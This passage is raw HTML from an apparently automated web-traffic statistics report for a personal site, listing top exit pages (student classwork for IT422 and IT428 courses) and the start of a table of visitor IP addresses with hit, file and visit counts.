<TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.82%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Progress/">/ClassWork/IT422/FinalProject/Progress/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/">/ClassWork/IT428/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.41%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Elastic/">/ClassWork/IT422/Elastic/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.41%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/">/ClassWork/IT422/FinalProject/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.41%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment2.html">/ClassWork/IT428/Assignment2.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/thanks.html">/ClassWork/IT422/FinalProject/thanks.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment3.html">/ClassWork/IT428/Assignment3.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SearchEngine.html">/ClassWork/IT428/SearchEngine.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Apollo11/">/ClassWork/IT422/Apollo11/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Elastic/KDrama.html">/ClassWork/IT422/Elastic/KDrama.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastDrunken.html">/ClassWork/IT422/FinalProject/CastDrunken.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastFearless.html">/ClassWork/IT422/FinalProject/CastFearless.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastHustle.html">/ClassWork/IT422/FinalProject/CastHustle.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastKiss.html">/ClassWork/IT422/FinalProject/CastKiss.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastOngBak.html">/ClassWork/IT422/FinalProject/CastOngBak.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/DrunkenHome.html">/ClassWork/IT422/FinalProject/DrunkenHome.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/FearlessHome.html">/ClassWork/IT422/FinalProject/FearlessHome.html</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPEXIT"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 20 of 39 Total Exit Pages</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>259</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>117</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">42.24%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>96</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.19%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/works.html">/works.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.42%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment3.html">/ClassWork/IT428/Assignment3.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.97%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment1.html">/ClassWork/IT428/Assignment1.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.61%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SearchEngine.html">/ClassWork/IT428/SearchEngine.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.25%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/">/ClassWork/IT428/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.25%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/indexSlideUpTop.html">/indexSlideUpTop.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.89%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Progress/">/ClassWork/IT422/FinalProject/Progress/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.17%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/">/ClassWork/IT422/FinalProject/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.81%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment2.html">/ClassWork/IT428/Assignment2.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Elastic/">/ClassWork/IT422/Elastic/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/DrunkenHome.html">/ClassWork/IT422/FinalProject/DrunkenHome.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Subscribe.html">/ClassWork/IT422/FinalProject/Subscribe.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/thanks.html">/ClassWork/IT422/FinalProject/thanks.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment4.html">/ClassWork/IT428/Assignment4.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Apollo11/">/ClassWork/IT422/Apollo11/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Elastic/KDrama.html">/ClassWork/IT422/Elastic/KDrama.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastDrunken.html">/ClassWork/IT422/FinalProject/CastDrunken.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastFearless.html">/ClassWork/IT422/FinalProject/CastFearless.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastHustle.html">/ClassWork/IT422/FinalProject/CastHustle.html</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPSITES"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=10>Top 50 of 208 Total Sites</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#0080FF" ALIGN=center COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Hostname</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1287</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">25.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3837</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">96.127.149.82</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>521</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>487</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">15.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16338</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">13.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.78%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">71.80.199.42</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>370</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>324</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5601</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.42%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">108.163.224.130</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>163</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.19%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>125</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.97%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2180</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">184.154.164.186</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>155</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>111</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.52%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2151</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">173.236.59.218</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>150</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>126</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6603</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.36%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.211.169</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>147</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>134</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5657</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.63%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.211.124</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>143</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.80%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>133</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5088</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.36%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.209.219</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>126</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>60</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.91%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>787</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.84.93.229</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>121</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>85</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1508</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.23%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD 